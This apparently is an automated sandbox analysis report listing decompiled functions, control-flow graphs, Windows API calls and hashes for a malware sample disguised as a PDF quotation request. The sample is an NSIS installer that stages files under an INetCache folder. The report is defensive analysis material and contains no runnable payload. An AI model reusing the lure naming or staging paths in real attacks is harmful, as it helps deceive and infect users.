                                                                                                                                  • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                                  • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                                  • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(75923420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                  • Opcode ID: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                  • Instruction ID: 3b49439eae3a82ac9864466e1d27f896d1b9bc200308884f11696e1f8cd425af
                                                                                                                                  • Opcode Fuzzy Hash: 26ecc7b94827cd81dbcd23612912991a36a9a8e6a086a5859bf6985d6c65a255
                                                                                                                                  • Instruction Fuzzy Hash: 3AD012755081209BC28117386E0C84B7A5C9F193317115B36FE6BF22E0CB388C6786DC
                                                                                                                                  APIs
                                                                                                                                  • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileFindFirst
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1974802433-0
                                                                                                                                  • Opcode ID: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                  • Instruction ID: 801a3ec73fa0f8c7b921e95059ce856047ace0635644dd2743fa1cdad283ab42
                                                                                                                                  • Opcode Fuzzy Hash: e4085221f00f99ea28b48dcf57fb83f2b364f19060254b57e6142408856da5b4
                                                                                                                                  • Instruction Fuzzy Hash: C5F08C71A005149BCB01EFA4DE49AAEB378FF04324F2045BBF105F31E1E7B89A409B29

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 257 403c41-403c53 258 403d94-403da3 257->258 259 403c59-403c5f 257->259 261 403df2-403e07 258->261 262 403da5-403ded GetDlgItem * 2 call 404119 SetClassLongW call 40140b 258->262 259->258 260 403c65-403c6e 259->260 265 403c70-403c7d SetWindowPos 260->265 266 403c83-403c86 260->266 263 403e47-403e4c call 404165 261->263 264 403e09-403e0c 261->264 262->261 276 403e51-403e6c 263->276 268 403e0e-403e19 call 401389 264->268 269 403e3f-403e41 264->269 265->266 271 403ca0-403ca6 266->271 272 403c88-403c9a ShowWindow 266->272 268->269 290 403e1b-403e3a SendMessageW 268->290 269->263 275 4040e6 269->275 277 403cc2-403cc5 271->277 278 403ca8-403cbd DestroyWindow 271->278 272->271 283 4040e8-4040ef 275->283 281 403e75-403e7b 276->281 282 403e6e-403e70 call 40140b 276->282 286 403cc7-403cd3 SetWindowLongW 277->286 287 403cd8-403cde 277->287 284 4040c3-4040c9 278->284 293 403e81-403e8c 281->293 294 4040a4-4040bd DestroyWindow EndDialog 281->294 282->281 284->275 291 4040cb-4040d1 284->291 286->283 288 403d81-403d8f call 404180 287->288 289 403ce4-403cf5 GetDlgItem 287->289 288->283 295 403d14-403d17 289->295 296 403cf7-403d0e SendMessageW IsWindowEnabled 289->296 290->283 291->275 298 4040d3-4040dc ShowWindow 291->298 293->294 299 403e92-403edf call 406077 call 404119 * 3 GetDlgItem 293->299 294->284 300 403d19-403d1a 295->300 301 403d1c-403d1f 295->301 296->275 296->295 298->275 327 403ee1-403ee6 299->327 328 403ee9-403f25 ShowWindow KiUserCallbackDispatcher call 40413b EnableWindow 299->328 304 403d4a-403d4f call 4040f2 300->304 305 403d21-403d27 301->305 306 403d2d-403d32 301->306 304->288 309 403d68-403d7b SendMessageW 305->309 310 403d29-403d2b 305->310 306->309 311 403d34-403d3a 306->311 309->288 310->304 315 403d51-403d5a call 40140b 311->315 316 403d3c-403d42 call 40140b 311->316 315->288 324 403d5c-403d66 315->324 325 403d48 316->325 324->325 325->304 327->328 331 403f27-403f28 328->331 332 403f2a 328->332 333 403f2c-403f5a GetSystemMenu EnableMenuItem SendMessageW 331->333 332->333 334 403f5c-403f6d SendMessageW 333->334 335 403f6f 333->335 336 403f75-403fb3 call 40414e call 406055 lstrlenW call 406077 SetWindowTextW call 401389 334->336 335->336 336->276 345 403fb9-403fbb 336->345 345->276 346 403fc1-403fc5 345->346 347 403fe4-403ff8 DestroyWindow 346->347 348 403fc7-403fcd 346->348 347->284 350 403ffe-40402b CreateDialogParamW 347->350 348->275 349 403fd3-403fd9 348->349 349->276 351 403fdf 349->351 350->284 352 404031-404088 call 404119 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 350->352 351->275 352->275 357 40408a-4040a2 ShowWindow call 404165 352->357 357->284
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F02
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                  • Opcode ID: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                  • Instruction ID: ea0d75974b1de0ff06d17ebe4cf6f8c3df4269cbbec1c2e45b889e3be151f72f
                                                                                                                                  • Opcode Fuzzy Hash: 3899400ff8e588ca518489e250fd262a6eccf12b27110187e4fcf668c4fe1b6b
                                                                                                                                  • Instruction Fuzzy Hash: 51C1AEB1604300ABDB206F61ED85E2B7AA8EB94706F50053EF641B61F0CB7999529B2D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 360 40389e-4038b6 call 40642b 363 4038b8-4038c3 GetUserDefaultUILanguage call 405f9c 360->363 364 4038ca-403901 call 405f22 360->364 367 4038c8 363->367 370 403903-403914 call 405f22 364->370 371 403919-40391f lstrcatW 364->371 369 403924-40394d call 403b74 call 405b11 367->369 377 403953-403958 369->377 378 4039df-4039e7 call 405b11 369->378 370->371 371->369 377->378 380 40395e-403986 call 405f22 377->380 384 4039f5-403a1a LoadImageW 378->384 385 4039e9-4039f0 call 406077 378->385 380->378 386 403988-40398c 380->386 388 403a9b-403aa3 call 40140b 384->388 389 403a1c-403a4c RegisterClassW 384->389 385->384 390 40399e-4039aa lstrlenW 386->390 391 40398e-40399b call 405a36 386->391 402 403aa5-403aa8 388->402 403 403aad-403ab8 call 403b74 388->403 392 403a52-403a96 SystemParametersInfoW CreateWindowExW 389->392 393 403b6a 389->393 397 4039d2-4039da call 405a09 call 406055 390->397 398 4039ac-4039ba lstrcmpiW 390->398 391->390 392->388 396 403b6c-403b73 393->396 397->378 398->397 401 4039bc-4039c6 GetFileAttributesW 398->401 405 4039c8-4039ca 401->405 406 4039cc-4039cd call 405a55 401->406 402->396 412 403b41-403b49 call 405287 403->412 413 403abe-403ad8 ShowWindow call 4063bf 403->413 405->397 405->406 406->397 420 403b63-403b65 call 40140b 412->420 421 403b4b-403b51 412->421 418 403ae4-403af6 GetClassInfoW 413->418 419 403ada-403adf call 4063bf 413->419 424 403af8-403b08 GetClassInfoW RegisterClassW 418->424 425 403b0e-403b31 DialogBoxParamW call 40140b 418->425 419->418 420->393 421->402 426 403b57-403b5e call 40140b 421->426 424->425 430 403b36-403b3f call 4037ee 425->430 426->402 430->396
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 004038B8
                                                                                                                                    • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                                  • lstrcatW.KERNEL32(1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"), ref: 0040391F
                                                                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 004039BD
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving), ref: 00403A06
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403A43
                                                                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A5B
                                                                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A90
                                                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403AC6
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403AF2
                                                                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403AFF
                                                                                                                                  • RegisterClassW.USER32(00433EA0), ref: 00403B08
                                                                                                                                  • DialogBoxParamW.USER32(?,00000000,00403C41,00000000), ref: 00403B27
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                  • API String ID: 606308-3150162093
                                                                                                                                  • Opcode ID: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                  • Instruction ID: 3415ad5ee5f1eed3d2c0e447cb4c4d8a0153f3b0974deb3f023f39c7f2583bdf
                                                                                                                                  • Opcode Fuzzy Hash: 1b384d1f77ad73b90eb4ead2ce7446fbf64eb66176232e5d4eff2d39ff252f29
                                                                                                                                  • Instruction Fuzzy Hash: A361CA706406006FD320AF66AD46F2B3A6CEB8474AF40553FF941B22E2DB7D5D41CA2D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 433 402dee-402e3c GetTickCount GetModuleFileNameW call 405c2a 436 402e48-402e76 call 406055 call 405a55 call 406055 GetFileSize 433->436 437 402e3e-402e43 433->437 445 402f63-402f71 call 402d8a 436->445 446 402e7c 436->446 438 403020-403024 437->438 452 402f73-402f76 445->452 453 402fc6-402fcb 445->453 448 402e81-402e98 446->448 450 402e9a 448->450 451 402e9c-402ea5 call 403242 448->451 450->451 460 402eab-402eb2 451->460 461 402fcd-402fd5 call 402d8a 451->461 455 402f78-402f90 call 403258 call 403242 452->455 456 402f9a-402fc4 GlobalAlloc call 403258 call 403027 452->456 453->438 455->453 484 402f92-402f98 455->484 456->453 482 402fd7-402fe8 456->482 462 402eb4-402ec8 call 405be5 460->462 463 402f2e-402f32 460->463 461->453 471 402f3c-402f42 462->471 480 402eca-402ed1 462->480 470 402f34-402f3b call 402d8a 463->470 463->471 470->471 473 402f51-402f5b 471->473 474 402f44-402f4e call 4064dc 471->474 473->448 481 402f61 473->481 474->473 480->471 486 402ed3-402eda 480->486 481->445 487 402ff0-402ff5 482->487 488 402fea 482->488 484->453 484->456 486->471 489 402edc-402ee3 486->489 490 402ff6-402ffc 487->490 488->487 489->471 491 402ee5-402eec 489->491 490->490 492 402ffe-403019 SetFilePointer call 405be5 490->492 491->471 493 402eee-402f0e 491->493 496 40301e 492->496 493->453 495 402f14-402f18 493->495 497 402f20-402f28 495->497 498 402f1a-402f1e 495->498 496->438 497->471 499 402f2a-402f2c 497->499 498->481 498->497 499->471
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,00000400,?,?,00000000,0040353A,?), ref: 00402E1B
                                                                                                                                    • Part of subcall function 00405C2A: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                                    • Part of subcall function 00405C2A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00402E67
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                  • String ID: "C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe"$(*B$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 4283519449-350045951
                                                                                                                                  • Opcode ID: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                  • Instruction ID: 7d4f9fc7c678da67c97c1a1890296b71ec8e814f853b941ab64c238268a70fe9
                                                                                                                                  • Opcode Fuzzy Hash: 4e6222d9f8d31f850ab2b6b3c84cade23aa30136a505619e7e62f3ee6ab772f2
                                                                                                                                  • Instruction Fuzzy Hash: AF51F731904205ABDB209F61DE89B9F7BB8EB44394F14403BF904B62C1C7B89D409BAD

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 826 401767-40178c call 402bbf call 405a80 831 401796-4017a8 call 406055 call 405a09 lstrcatW 826->831 832 40178e-401794 call 406055 826->832 837 4017ad-4017ae call 4062e9 831->837 832->837 841 4017b3-4017b7 837->841 842 4017b9-4017c3 call 406398 841->842 843 4017ea-4017ed 841->843 850 4017d5-4017e7 842->850 851 4017c5-4017d3 CompareFileTime 842->851 845 4017f5-401811 call 405c2a 843->845 846 4017ef-4017f0 call 405c05 843->846 853 401813-401816 845->853 854 401885-4018ae call 4051b4 call 403027 845->854 846->845 850->843 851->850 856 401867-401871 call 4051b4 853->856 857 401818-401856 call 406055 * 2 call 406077 call 406055 call 40579a 853->857 868 4018b0-4018b4 854->868 869 4018b6-4018c2 SetFileTime 854->869 866 40187a-401880 856->866 857->841 889 40185c-40185d 857->889 870 402a55 866->870 868->869 872 4018c8-4018d3 CloseHandle 868->872 869->872 876 402a57-402a5b 870->876 874 4018d9-4018dc 872->874 875 402a4c-402a4f 872->875 878 4018f1-4018f4 call 406077 874->878 879 4018de-4018ef call 406077 lstrcatW 874->879 875->870 883 4018f9-40228d call 40579a 878->883 879->883 883->876 889->866 891 40185f-401860 889->891 891->856
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017A8
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,?,00000031), ref: 004017CD
                                                                                                                                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2521375985.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2521361831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521393084.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521406226.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2521484999.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp$C:\Users\user\AppData\Local\Temp\nsb13EA.tmp\System.dll$Call
                                                                                                                                  • API String ID: 1941528284-955525756
                                                                                                                                  • Opcode ID: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                  • Instruction ID: 02e4f6238df89927c362e8fae2a75ca1a565c16d749b69ec27d3a85cbadddcd8
                                                                                                                                  • Opcode Fuzzy Hash: 7eb387cec2b929145506f0f371aad0ef0a8c00339c8b79c916bd0341b2f4fd7b
                                                                                                                                  • Instruction Fuzzy Hash: 0941B631900515BACF11BFB5CC45EAF7679EF05328B24423BF522B10E1DB3C86519A6D

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
